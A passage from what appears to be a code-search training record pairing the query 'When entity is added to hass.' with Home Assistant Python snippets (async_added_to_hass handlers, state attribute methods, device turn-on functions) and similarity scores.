self._zone.status\n attr[\"schedule_count\"] = len(self._zone.schedules)\n attr[\"schedules\"] = \"\"\n attr[\"adjustment\"] = self._zone.adjustment.as_string\n current = self._zone.runs.current_run\n if current is not None:\n if current.schedule is not None:\n attr[\"current_schedule\"] = current.schedule.schedule_index + 1\n attr[\"current_name\"] = current.schedule.name\n else:\n attr[\"current_schedule\"] = RES_MANUAL\n attr[\"current_name\"] = RES_MANUAL\n attr[\"current_start\"] = dt.as_local(current.start_time)\n attr[\"current_duration\"] = str(current.duration)\n attr[\"time_remaining\"] = str(current.time_remaining)\n attr[\"percent_complete\"] = current.percent_complete\n else:\n attr[\"current_schedule\"] = RES_NOT_RUNNING\n attr[\"percent_complete\"] = 0\n\n next = self._zone.runs.next_run\n if next is not None:\n if next.schedule is not None:\n attr[\"next_schedule\"] = next.schedule.schedule_index + 1\n attr[\"next_name\"] = next.schedule.name\n else:\n attr[\"next_schedule\"] = RES_MANUAL\n attr[\"next_name\"] = RES_MANUAL\n attr[\"next_start\"] = dt.as_local(next.start_time)\n attr[\"next_duration\"] = str(next.duration)\n else:\n attr[\"next_schedule\"] = RES_NONE\n\n return attr", "def extra_state_attributes(self):\n attrs = {\n ATTR_NODE_ID: self.node_id,\n ATTR_NODE_NAME: self._name,\n ATTR_MANUFACTURER_NAME: self._manufacturer_name,\n ATTR_PRODUCT_NAME: self._product_name,\n }\n attrs.update(self._attributes)\n if self.battery_level is not None:\n attrs[ATTR_BATTERY_LEVEL] = self.battery_level\n if self.wakeup_interval is not None:\n attrs[ATTR_WAKEUP] = self.wakeup_interval\n if self._application_version is not None:\n attrs[ATTR_APPLICATION_VERSION] = self._application_version\n\n return attrs", "def extra_state_attributes(self):\n attr = self._attributes\n if self.tesla_device.has_battery():\n attr[ATTR_BATTERY_LEVEL] = self.tesla_device.battery_level()\n attr[ATTR_BATTERY_CHARGING] = self.tesla_device.battery_charging()\n return attr", "def state_attributes(self) -> Dict[str, Any]:\n return {**super(WarmupThermostat, self).state_attributes, **self.attributes}", "def device_state_attributes(self):\n attributes = {}\n\n if self._type == \"weather\":\n attributes[\"data\"] = self._connector.get_condition_hourly()\n elif self._type == \"weather_report\":\n attributes[\"data\"] = self._connector.get_weather_report()\n elif self._type == \"temperature\":\n attributes[\"data\"] = self._connector.get_temperature_hourly()\n elif self._type == \"dewpoint\":\n attributes[\"data\"] = self._connector.get_dewpoint_hourly()\n elif self._type == \"pressure\":\n attributes[\"data\"] = self._connector.get_pressure_hourly()\n elif self._type == \"wind_speed\":\n attributes[\"data\"] = self._connector.get_wind_speed_hourly()\n elif self._type == \"wind_direction\":\n attributes[\"data\"] = self._connector.get_wind_direction_hourly()\n elif self._type == \"wind_gusts\":\n attributes[\"data\"] = self._connector.get_wind_gusts_hourly()\n elif self._type == \"precipitation\":\n attributes[\"data\"] = self._connector.get_precipitation_hourly()\n elif self._type == \"precipitation_probability\":\n attributes[\"data\"] = self._connector.get_precipitation_probability_hourly()\n elif self._type == \"precipitation_duration\":\n attributes[\"data\"] = self._connector.get_precipitation_duration_hourly()\n elif self._type == \"cloud_coverage\":\n attributes[\"data\"] = self._connector.get_cloud_coverage_hourly()\n elif self._type == \"visibility\":\n attributes[\"data\"] = 
self._connector.get_visibility_hourly()\n elif self._type == \"sun_duration\":\n attributes[\"data\"] = self._connector.get_sun_duration_hourly()\n elif self._type == \"sun_irradiance\":\n attributes[\"data\"] = self._connector.get_sun_irradiance_hourly()\n elif self._type == \"fog_probability\":\n attributes[\"data\"] = self._connector.get_fog_probability_hourly()\n elif self._type == \"humidity\":\n attributes[\"data\"] = self._connector.get_humidity_hourly()\n\n attributes[ATTR_ISSUE_TIME] = self._connector.infos[ATTR_ISSUE_TIME]\n attributes[ATTR_LATEST_UPDATE] = self._connector.infos[ATTR_LATEST_UPDATE]\n attributes[ATTR_STATION_ID] = self._connector.infos[ATTR_STATION_ID]\n attributes[ATTR_STATION_NAME] = self._connector.infos[ATTR_STATION_NAME]\n attributes[ATTR_ATTRIBUTION] = ATTRIBUTION\n return attributes", "def state(self) -> 'outputs.DeviceStateResponse':\n return pulumi.get(self, \"state\")" ]
[ "0.93173087", "0.9245708", "0.92207897", "0.92147964", "0.92147964", "0.9210798", "0.9210798", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91909975", "0.91441494", "0.9104897", "0.90553176", "0.90515023", "0.90515023", "0.9017299", "0.892098", "0.88845754", "0.88437164", "0.875476", "0.8743821", "0.8669118", "0.8628668", "0.86186224", "0.86186224", "0.85022706", "0.8455415", "0.84483206", "0.8444541", "0.8440318", "0.84394234", "0.8429921", "0.8423787", "0.84181386", "0.8404023", "0.8394754", "0.8366419", "0.83540905", "0.83512175", "0.8344845", "0.8341148", "0.83178765", "0.8315584", "0.8298955", "0.82813984", "0.8257902", "0.8250856", "0.82310456", "0.8228878", "0.82233864", "0.82030797", "0.8192418", "0.81884867", "0.81231606", "0.8110774", "0.808144", "0.80749196", "0.80317736", "0.7985119", "0.7985119", "0.79694945", "0.7952288", "0.79385823", "0.79113895", "0.78787047", "0.7814134", "0.78067756", "0.77751815", "0.7763412", "0.7730652", "0.77212334", "0.76967883", "0.7659658", "0.763762", "0.7582756", "0.7571003", "0.75672853", "0.755491", "0.74775344", "0.745957", "0.74076897", "0.73887604", "0.73883766", "0.7329229", "0.73167735", "0.72690624", "0.72610897", "0.72609174", "0.71374214" ]
0.8087728
66
When entity is added to hass.
async def async_added_to_hass(self): self.async_on_remove( self.coordinator.async_add_listener(self.async_write_ha_state) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def async_added_to_hass(self):\n self.hass.data[DOMAIN].add_entity_id(self.entity_id)\n self.hass.data[DOMAIN].add_sensor(self)", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n self.coordinator.entities.append(self)", "async def async_added_to_hass(self):\n self.hass.data[DOMAIN][\"entities\"][\"fan\"].append(self)", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n if DOMAIN not in self.hass.data:\n self.hass.data[DOMAIN] = {}\n if SENSOR_PLATFORM not in self.hass.data[DOMAIN]:\n self.hass.data[DOMAIN][SENSOR_PLATFORM] = {}\n self.hass.data[DOMAIN][SENSOR_PLATFORM][self.entity_id] = self\n\n if self._calendar:\n if CALENDAR_PLATFORM not in self.hass.data[DOMAIN]:\n self.hass.data[DOMAIN][CALENDAR_PLATFORM] = EntitiesCalendarData(self.hass)\n _LOGGER.debug(\"Creating fkfgarbage_collection calendar \" + self._name)\n self.hass.async_create_task(\n async_load_platform(\n self.hass,\n CALENDAR_PLATFORM,\n DOMAIN,\n {\"name\": CALENDAR_NAME},\n {\"name\": CALENDAR_NAME},\n )\n )\n self.hass.data[DOMAIN][CALENDAR_PLATFORM].add_entity(self.entity_id)", "async def async_added_to_hass(self):\n # Sensors should also register callbacks to HA when their state changes\n if self._product is not None:\n self._product.register_callback(self.async_write_ha_state)", "async def async_added_to_hass(self):\n # Sensors should also register callbacks to HA when their state changes\n if self._product is not None:\n self._product.register_callback(self.async_write_ha_state)", "async def async_added_to_hass(self):\n\n def gpio_edge_listener(port):\n \"\"\"Update GPIO when edge change is detected.\"\"\"\n self.schedule_update_ha_state(True)\n\n def setup_entity():\n setup_input(self._port)\n edge_detect(self._port, gpio_edge_listener)\n self.schedule_update_ha_state(True)\n\n await self.hass.async_add_executor_job(setup_entity)", "async def async_added_to_hass(self) -> None:\n self._table.add_listener(self.async_write_ha_state)", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n # Sensors should also register callbacks to HA when their state changes\n if self._product is not None:\n self._product.register_callback(self.async_write_ha_state)", "async def async_added_to_hass(self) -> None:\n self._nobo.register_callback(self._after_update)", "async def async_added_to_hass(self):\n self._attr_image_last_updated = dt_util.utcnow()", "def on_entity_update(self, event):\n self.entity.on_entity_update(event)", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n async_track_state_change_event(\n self.hass,\n [self._source_entity_id],\n self._async_compensation_sensor_state_listener,\n )\n )", "async def async_added_to_hass(self):\n self._device.register_update_callback(self.async_schedule_update_ha_state)", "async def async_added_to_hass(self):\n self.coordinator.async_add_listener(self.async_write_ha_state)", "def addEntity (self, entity):\n if entity in self:\n raise RuntimeError(\"Entity exists\")\n self.add(entity)\n self.log.info(str(entity) + \" joined\")\n self.raiseEvent(EntityJoin, entity)", "async def async_added_to_hass(self):\n self.async_on_remove(\n self._coordinator.async_add_listener(self.async_write_ha_state)\n )\n self.update_state()", "async def async_added_to_hass(self):\n self._coordinator.add_dahua_event_listener(self._event_name, self.async_write_ha_state)", "async def async_added_to_hass(self) -> None:\n self._client.set_callback(self.schedule_update_ha_state)\n 
self.hass.data[DOMAIN][self._entry_id].clients.append(self)", "async def async_added_to_hass(self):\n _LOGGER.debug(\n \"New switch %s (%s %s)\",\n self._inst,\n self._sid_data[\"sid\"],\n self._data[self._sid_data[\"sid_uid\"]],\n )", "async def async_added_to_hass(self):\n self._car.add_update_listener(self.update_callback)", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n self._coordinator.async_add_listener(self.async_write_ha_state)\n )", "async def async_added_to_hass(self) -> None:\n self._async_setup(self.entity_id)\n\n self._cast_view_remove_handler = async_dispatcher_connect(\n self.hass, SIGNAL_HASS_CAST_SHOW_VIEW, self._handle_signal_show_view\n )", "def on_add(self):\n self.notify(on_add())", "async def async_added_to_hass(self):\n self.async_on_remove(self.wrapper.async_add_listener(self._update_callback))", "def on_insert(self) -> None:", "async def async_added_to_hass(self):\n await self.coordinator.add_key(self._key, self._typeconf)\n await super().async_added_to_hass()", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n\n def on_state_changed():\n self.schedule_update_ha_state()\n\n for service in self._device.device_services:\n service.subscribe_callback(self.entity_id, on_state_changed)", "async def async_added_to_hass(self):\n\n self._undo_dispatcher = async_dispatcher_connect(\n self.hass,\n SIGNAL_TADO_UPDATE_RECEIVED.format(\"device\", self.device_id),\n self._async_update_callback,\n )\n self._async_update_device_data()", "async def async_added_to_hass(self):\n self.async_on_remove(self.coordinator.async_add_listener(self.refresh))", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self._handle_coordinator_update()", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_on_remove(\n self.coordinator.start_fetch_data(self.module_id, self.data_id)\n )", "def add_entity(self, entity):\n self.append(entity)\n if self.size > 0:\n self.sort()", "async def async_added_to_hass(self):\n async_dispatcher_connect(\n self.hass,\n SERVICE_SET_MODE_SIGNAL.format(self.entity_id),\n self.set_mode\n )", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n\n old_state = await self.async_get_last_state()\n if old_state is not None:\n self._state = old_state.state == STATE_ON\n\n def _handle_event(event):\n \"\"\"Check if event applies to me and update.\"\"\"\n if event.device.id_string != self._event.device.id_string:\n return\n\n self.apply_event(event)\n\n self.async_on_remove(\n self.hass.helpers.dispatcher.async_dispatcher_connect(\n SIGNAL_EVENT, _handle_event\n )\n )", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n async_dispatcher_connect(\n self.hass,\n f\"{ANTHEMAV_UPDATE_SIGNAL}_{self._entry_id}\",\n self.update_states,\n )\n )", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_accept_signal(\n self._cluster_handler, SIGNAL_ATTR_UPDATED, self.async_set_state\n )", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self._update_from_rest_data()\n if self._coordinator:\n self.async_on_remove(\n self._coordinator.async_add_listener(self._handle_coordinator_update)\n )", "async def async_added_to_hass(self):\n async_dispatcher_connect(self.hass, DOMAIN, self._refresh)", "def _during_execute(self, db, entity):\n pass", "def OnAdd(self, controller):\n pass", "async def async_added_to_hass(self) -> None:\n 
self.async_on_remove(\n self._coordinator.async_add_listener(self._update_callback)\n )\n self._update_callback()", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n state = await self.async_get_last_state()\n if state:\n self._state = state.state\n\n #TEST info\n try:\n if 'typeCompteur' in state.attributes:\n self.attrs = state.attributes\n _LOGGER.info(\"Redemarrage avec element present ??\")\n except:\n _LOGGER.info(\"Redemarrage mais rien de present\")\n pass\n\n @callback\n def update():\n \"\"\"Update state.\"\"\"\n self._update_state()\n self.async_write_ha_state()\n\n self.async_on_remove(self.coordinator.async_add_listener(update))\n self._update_state()\n if not state:\n return", "def add_entities(entities, async_add_entities, hass):\n async_add_entities(entities)", "def _after_execute(self, db, entity):\n pass", "def _after_execute(self, db, entity):\n pass", "async def async_added_to_hass(self):\n\n async def async_update_state():\n \"\"\"Update sensor state.\"\"\"\n await self.async_update_ha_state(False)\n\n async_dispatcher_connect(self.hass, \"WiserSmartUpdateMessage\", async_update_state)", "def add_entity(self, entity_id):\n if entity_id not in self.entities:\n self.entities.append(entity_id)", "def add_ent(self, item: 'Entity') -> None:\n self.entities.append(item)\n self.by_class[item['classname', ''].casefold()].add(item)\n self.by_target[item['targetname', ''].casefold() or None].add(item)\n if 'nodeid' in item:\n try:\n node_id = int(item['nodeid'])\n except (TypeError, ValueError):\n pass\n else:\n item['nodeid'] = str(self.node_id.get_id(node_id))", "async def async_added_to_hass(self):\n\n self._undo_dispatcher = async_dispatcher_connect(\n self.hass,\n SIGNAL_TADO_UPDATE_RECEIVED.format(\"zone\", self.zone_id),\n self._async_update_callback,\n )\n self._async_update_zone_data()", "def add_entity(self, ent):\n self.tiles[ent.position[x]][ent.position[y]].add_entity(ent)", "def process_IN_CREATE(self, event):", "async def async_added_to_hass(self):\n self.async_on_remove(\n async_dispatcher_connect(\n self.hass,\n self._router.signal_device_update,\n self.async_update_device,\n )\n )", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_accept_signal(\n self._cover_cluster_handler, SIGNAL_ATTR_UPDATED, self.async_set_position\n )", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(start.async_at_start(self.hass, self._async_start))", "async def async_added_to_hass(self):\n await super().async_added_to_hass()\n\n # Add listener\n async_track_state_change(\n self.hass, self.temperature_sensor_entity_id, self._async_temperature_sensor_changed\n )\n async_track_state_change(\n self.hass, self.humidity_sensor_entity_id, self._async_humidity_sensor_changed\n )\n\n @callback\n def _async_startup(event):\n \"\"\"Init on startup.\"\"\"\n sensor_state_temperature = self.hass.states.get(self.temperature_sensor_entity_id)\n if sensor_state_temperature and sensor_state_temperature.state != STATE_UNKNOWN:\n self._async_update_temperature(sensor_state_temperature)\n\n sensor_state_humidity = self.hass.states.get(self.humidity_sensor_entity_id)\n if sensor_state_humidity and sensor_state_humidity.state != STATE_UNKNOWN:\n self._async_update_humidity(sensor_state_humidity)\n\n self.hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, _async_startup)", "async def async_internal_added_to_hass(self) -> None:\n await super().async_internal_added_to_hass()\n if not self.registry_entry:\n 
return\n self._async_read_entity_options()\n self._update_suggested_precision()", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n self.coordinator.async_add_listener(self._refresh_from_coordinator)\n )", "async def async_added_to_hass(self) -> None:\n self._group.set_callback(self.schedule_update_ha_state)\n self.hass.data[DOMAIN][self._entry_id].groups.append(self)", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_accept_signal(\n self._on_off_cluster_handler,\n SIGNAL_ATTR_UPDATED,\n self.async_set_open_closed,\n )\n self.async_accept_signal(\n self._level_cluster_handler, SIGNAL_SET_LEVEL, self.async_set_level\n )", "def after_put(self, *args, **kwargs):\n # Override this method in inheriting models.\n pass", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_accept_signal(\n self._on_off_cluster_handler, SIGNAL_ATTR_UPDATED, self.async_set_state\n )", "async def async_added_to_hass(self):\n self._unsub_dispatcher = async_dispatcher_connect(\n self.hass, SERVICE_UPDATE, self.async_write_ha_state\n )", "async def async_added_to_hass(self):\r\n if self.hass.is_running:\r\n await self._initialize()\r\n else:\r\n self.hass.bus.async_listen_once(\r\n EVENT_HOMEASSISTANT_STARTED, self._initialize\r\n )\r\n\r\n self._update_state()", "def onAddEnemy(self, entityID):\n\t\tAI.onAddEnemy(self, entityID)\n\t\tCombat.onAddEnemy(self, entityID)", "def on_join(self, event):\n con = self.connection\n em = self.server.entity_manager\n self.entity.init(con.entity_id, con.entity_data, em)\n self.server.entity_list[self.entity.id] = self.entity", "async def async_added_to_opp(self):\n self.opp.data[DOMAIN][\"entities\"][\"scene\"].append(self)", "def add(self, entity):\n self.entities.add(entity)\n return entity", "async def async_added_to_hass(self) -> None:\n if not (last_state := await self.async_get_last_state()):\n return\n self._attr_is_on = last_state.state == STATE_ON\n\n if self._attr_is_on:\n evt.async_call_later(self.hass, OFF_DELAY, self.off_delay_listener)", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_on_remove(\n self._version_coordinator.async_add_listener(\n self._handle_coordinator_update, self.coordinator_context\n )\n )\n self.update_from_latest_data()", "def add_event(self, event):\r\n return super().insert_event(event)", "async def async_added_to_hass(self) -> None:\n self.async_on_remove(\n self.hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, self.disconnect)\n )", "async def async_added_to_hass(self):\n self._device.set_update_callback(self._update)\n self.hass.bus.async_listen(\n EVENT_HDMI_CEC_UNAVAILABLE, self._hdmi_cec_unavailable\n )", "async def async_added_to_hass(self):\n # If not None, we got an initial value.\n await super().async_added_to_hass()\n state = await self.async_get_last_state()\n if not state:\n return\n self._state = state.state == \"on\"", "def __init__(self, hass, name, device, should_poll=False):\n self.hass = hass\n self._name = name\n self._device = device\n self._should_poll = should_poll\n if not should_poll:\n self._device.update_entities.append(self)", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n self.async_accept_signal(\n self._cluster_handler, SIGNAL_ARMED_STATE_CHANGED, self.async_set_armed_mode\n )\n self.async_accept_signal(\n self._cluster_handler, SIGNAL_ALARM_TRIGGERED, self.async_alarm_trigger\n )", "def _before_execute(self, 
db, entity):\n pass", "def _before_execute(self, db, entity):\n pass", "async def async_added_to_hass(self) -> None:\n await super().async_added_to_hass()\n if self._battery_cluster_handler:\n self.async_accept_signal(\n self._battery_cluster_handler,\n SIGNAL_ATTR_UPDATED,\n self.async_battery_percentage_remaining_updated,\n )", "def after_insert(self, obj, st):\n pass", "def after_update(self, obj, st):\n pass", "async def added(self, value):\n pass", "async def async_added_to_hass(self):\n # If not None, we got an initial value.\n await super().async_added_to_hass()\n if self._state is not None:\n return\n\n state = await self.async_get_last_state()\n self._state = state and state.state == STATE_ON", "async def async_added_to_hass(self):\n self._async_update_current_cover_position()\n self.async_on_remove(\n self.coordinator.async_add_listener(self._async_update_shade_from_group)\n )", "async def async_setup_entry(\n hass: HomeAssistantType, config_entry: ConfigType, async_add_entities\n):\n entities_to_create = hass.data[DATA_AMPIO][alarm.DOMAIN]\n\n unsub = async_dispatcher_connect(\n hass,\n SIGNAL_ADD_ENTITIES,\n functools.partial(\n discovery.async_add_entities,\n async_add_entities,\n entities_to_create,\n AmpioSatelAlarmControlPanel,\n ),\n )\n hass.data[DATA_AMPIO][DATA_AMPIO_DISPATCHERS].append(unsub)", "def __init__(self, hass, integration_name, entity):\n super().__init__(hass, integration_name, entity)\n\n self._last_alert = None", "def add_entity(self, entity_obj):\n if (\n type(entity_obj) is not dict\n or \"entity_id\" not in entity_obj\n or \"mentions\" not in entity_obj\n ):\n raise ValueError(\n \"The input to update_entity needs to be a dictionary with an entity_id key and mentions key as \"\n \"you are replacing the entity information in bulk.\"\n )\n try:\n ent = EntityObj(\n entity_id=entity_obj[\"entity_id\"],\n mentions=entity_obj[\"mentions\"],\n title=entity_obj.get(\"title\", entity_obj[\"entity_id\"]),\n description=entity_obj.get(\"description\", \"\"),\n types=entity_obj.get(\"types\", {}),\n relations=entity_obj.get(\"relations\", []),\n )\n except ValidationError as e:\n print(e.json())\n raise e\n # We assume this is a new entity\n if self._entity_symbols.qid_exists(ent.entity_id):\n raise ValueError(\n f\"The entity {ent.entity_id} already exists. Please call update_entity instead.\"\n )\n # Add type systems of type_sys -> QID -> list of type names\n for type_sys in ent.types:\n if type_sys not in self._type_systems:\n raise ValueError(\n f\"Error {entity_obj}. When adding a new entity, you must use the same type system. \"\n f\"We don't support new type systems.\"\n )\n # Add kg relations QID -> relation -> list of object QIDs\n parsed_rels = {}\n for rel_pair in ent.relations:\n if \"relation\" not in rel_pair or \"object\" not in rel_pair:\n raise ValueError(\n \"For each value in relations, it must be a JSON with keys relation and object\"\n )\n if (\n self._kg_symbols is not None\n and rel_pair[\"relation\"] not in self._kg_symbols.get_all_relations()\n ):\n raise ValueError(\n f\"Error {entity_obj}. When adding a new entity, you must use the same set of relations. 
\"\n f\"We don't support new relations.\"\n )\n if rel_pair[\"relation\"] not in parsed_rels:\n parsed_rels[rel_pair[\"relation\"]] = []\n parsed_rels[rel_pair[\"relation\"]].append(rel_pair[\"object\"])\n # Lower case mentions for mention extraction\n mentions = [\n [get_lnrm(men[0], strip=True, lower=True), men[1]] for men in ent.mentions\n ]\n self._entity_symbols.add_entity(\n ent.entity_id, mentions, ent.title, ent.description\n )\n for type_sys in self._type_systems:\n self._type_systems[type_sys].add_entity(\n ent.entity_id, ent.types.get(type_sys, [])\n )\n if self._kg_symbols is not None:\n self._kg_symbols.add_entity(ent.entity_id, parsed_rels)", "async def async_setup_entry(hass, config_entry, async_add_entities):\n scenes = []\n bridge = hass.data[DOMAIN]\n\n for event in bridge.devices[\"scene\"]:\n entity = HomeSeerScene(event)\n scenes.append(entity)\n _LOGGER.info(f\"Added HomeSeer event: {entity.name}\")\n\n if scenes:\n async_add_entities(scenes)", "def _connect_events(self, entity):\n for event_json in self.entity_json['events']:\n event_id = event_json['id']\n event_verb = event_json['verb']\n event = self.world.events[event_id]\n entity.events.add(event_verb, event)", "def _add_full_entity(self, entity):\n marked_id = utils.get_peer_id(\n utils.get_input_peer(entity, allow_self=False), add_mark=True\n )\n try:\n old_entity = self._entities[marked_id]\n old_entity.__dict__.update(entity.__dict__) # Keep old references\n\n # Update must delete old username and phone\n username = getattr(old_entity, 'username', None)\n if username:\n del self._username_id[username.lower()]\n\n phone = getattr(old_entity, 'phone', None)\n if phone:\n del self._phone_id[phone]\n except KeyError:\n # Add new entity\n self._entities[marked_id] = entity\n\n # Always update username or phone if any\n username = getattr(entity, 'username', None)\n if username:\n self._username_id[username.lower()] = marked_id\n\n phone = getattr(entity, 'phone', None)\n if phone:\n self._username_id[phone] = marked_id", "def add_np_entity(self, entity):\n if entity._type == Genre.HUMAN:\n self._entities['humans'].append(entity)\n\n elif entity._type == Genre.COP:\n self._entities['cops'].append(entity)\n\n elif entity._type == Genre.BERZERK:\n self._entities['berzerks'].append(entity)\n\n if entity not in self._entities['all']:\n self._entities['all'].append(entity)", "def cli(ctx, entity, params={}):\n return ctx.gi.entity.add_entity(entity, params=params)", "def add_new_entry(self, ent):\n ent.inserted = time.strftime(\"%D\")\n ent = self.add_entry(ent)\n if ent is not None:\n self.modified_collection = True\n return ent", "async def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigType, async_add_entities\n) -> None:\n hass_data = hass.data[DOMAIN][entry.entry_id]\n\n async_add_entities(\n [\n MetOfficeCurrentSensor(entry.data, hass_data, sensor_type)\n for sensor_type in SENSOR_TYPES\n ],\n False,\n )" ]
[ "0.79615426", "0.7715403", "0.73743874", "0.72151524", "0.69275665", "0.69275665", "0.6916353", "0.6870173", "0.6820395", "0.6781351", "0.6752743", "0.6735904", "0.67260987", "0.67226434", "0.67097443", "0.6699443", "0.66656816", "0.6656795", "0.66509074", "0.6563511", "0.6549902", "0.65494496", "0.6533467", "0.6529362", "0.6512587", "0.649037", "0.64617395", "0.64587045", "0.6454905", "0.6448177", "0.6433255", "0.6423828", "0.64149404", "0.64125025", "0.64031637", "0.640219", "0.637394", "0.6365229", "0.6363184", "0.6359675", "0.63426816", "0.63303906", "0.63120145", "0.6306652", "0.6284313", "0.6284313", "0.6281969", "0.62609947", "0.62466097", "0.6235621", "0.6232268", "0.62206507", "0.62195605", "0.62152433", "0.6205613", "0.62004745", "0.61907756", "0.61608577", "0.61590505", "0.6146812", "0.6140945", "0.612921", "0.61157066", "0.6114553", "0.61070055", "0.6095251", "0.6073931", "0.6055812", "0.6028941", "0.60231584", "0.60189795", "0.600916", "0.6007534", "0.60044897", "0.59638035", "0.59618944", "0.5958373", "0.5958373", "0.5957683", "0.5926142", "0.5918641", "0.5887051", "0.58765584", "0.58720714", "0.5858857", "0.58557874", "0.58502305", "0.5848605", "0.5839499", "0.58232737", "0.5819607", "0.5816266", "0.58060265", "0.57976633" ]
0.66790694
20
Turn the device on.
async def async_turn_on(self, **kwargs): if self._switch_type == "record_motion": _LOGGER.debug("Turning on Motion Detection") await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_MOTION) elif self._switch_type == "record_always": _LOGGER.debug("Turning on Constant Recording") await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_ALLWAYS) else: _LOGGER.debug("Turning on IR") await self.upv.set_camera_ir(self._camera_id, self._ir_on_cmd) await self.coordinator.async_request_refresh()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def turn_on(self, **kwargs):\n self._state = True\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device,'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":1 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":1 }', 5)", "def turn_on(self, **kwargs):\n self.smartplug.turn_on()", "def turn_on(self, **kwargs) -> None:\n self._device.writeCharacteristic(self._handle, b'\\x00', True)\n self._state = True\n self.schedule_update_ha_state()", "def _turn_on_dev_mode(self):\n if self._device is not None:\n self._char_write(self._BLE_SERVICE_ANTI_DOS,\n [ord(c) for c in self._ANTI_DOS_MESSAGE])\n self._char_write(self._BLE_SERVICE_TX_POWER,\n [self._TX_POWER_VALUE])\n # Sending 0x01 to the wake service wakes the sphero.\n self._char_write(self._BLE_SERVICE_WAKE, [0x01])", "def on(config: dict):\n switch_device(config, config[\"inching\"], \"on\")", "def force_switch_on(self):\n self.turn_on_modem()", "def turn_on(self, **kwargs):\n self._is_on = True", "def turn_on(self):\n self._remote.power(1)", "def enable(self):\n # Netmiko reports enable and config mode as being enabled\n if not self.native.check_enable_mode():\n self.native.enable()\n # Ensure device is not in config mode\n if self.native.check_config_mode():\n self.native.exit_config_mode()\n\n log.debug(\"Host %s: Device enabled.\", self.host)", "async def async_turn_on(self, **kwargs):\n try:\n if await self._api.set_relay_state(self._dev_id, \"on\"):\n self._is_on = True\n self.async_write_ha_state()\n except Smile.PlugwiseError:\n _LOGGER.error(\"Error while communicating to device\")", "def turn_on(self, **kwargs):\n set_sonoff_state(self._host, \"on\")\n self._state = True", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self._client.turn_on(self._device_port)", "def turn_on(self, **kwargs):\n self._is_on = True\n self.schedule_update_ha_state()\n self.hass.data[ZIGATE_DOMAIN].action_onoff(self._device.addr,\n self._endpoint,\n 1)", "def turn_on(self):\n GPIO.output(self.gpio, True) # turn on light", "def turn_on(self, **kwargs):\n self._send_command(\"turn_on\")", "def turn_on(self, **kwargs: Any) -> None:\n with self._wemo_call_wrapper(\"turn on\"):\n self.wemo.on()", "def turn_on(self):\n self._interrupt_flash()\n if not self.on:\n GPIO.output(self.pin, GPIO.HIGH)\n self.on = True", "async def async_turn_on(self, **kwargs: Any) -> None:\n _LOGGER.debug(\"Tried to switch on %s\", self.name)\n try:\n await self.hass.async_add_executor_job(\n self.device.appliance.set_setting, BSH_POWER_STATE, BSH_POWER_ON\n )\n except HomeConnectError as err:\n _LOGGER.error(\"Error while trying to turn on device: %s\", err)\n self._state = False\n self.async_entity_update()", "def _turn_on(self):\n self._turn_display('ON')", "def turn_on(self):\n self._state = True\n self.write_state(bytes([9]))\n self.schedule_update_ha_state()", "def ON(self):\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(self.PIN, GPIO.OUT)\n GPIO.output(self.PIN, True)\n self.STATUS = \"ON\"", "def turn_on_modem(self):\n if not self.is_power_on():\n self._logger.debug(\"Switching modem on...\")\n self.set_pin()\n # give modem some time to login\n time.sleep(10)\n else:\n self._logger.debug(\"Modem is already powered on...\")", "async def async_turn_on(self):\n path = \"/interface\"\n param = \"default-name\"\n if \"-\" in 
self._data[\"port-mac-address\"]:\n param = \"name\"\n value = self._data[param]\n mod_param = \"disabled\"\n mod_value = False\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n\n if self._data[\"poe-out\"] == \"off\":\n path = \"/interface/ethernet\"\n self._ctrl.set_value(path, param, value, \"poe-out\", \"auto-on\")\n\n await self._ctrl.force_update()", "def turn_on(self, **kwargs: Any) -> None:\n self._set_light(ON_STATE)", "async def async_turn_on(self, **kwargs):\n try:\n state_on = await self._api.set_relay_state(\n self._dev_id, self._members, \"on\"\n )\n if state_on:\n self._is_on = True\n self.async_write_ha_state()\n except PlugwiseException:\n _LOGGER.error(\"Error while communicating to device\")", "def on(self):\n self.state = \"ON\"\n logger.info(\"Turning on %s lamp at %s port %s plug %s\" % (self.name,\n self.host,\n self.port,\n self.plug))\n return self.send_cmd(\"pset %s 1\" % self.plug)", "async def async_turn_on(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, True)", 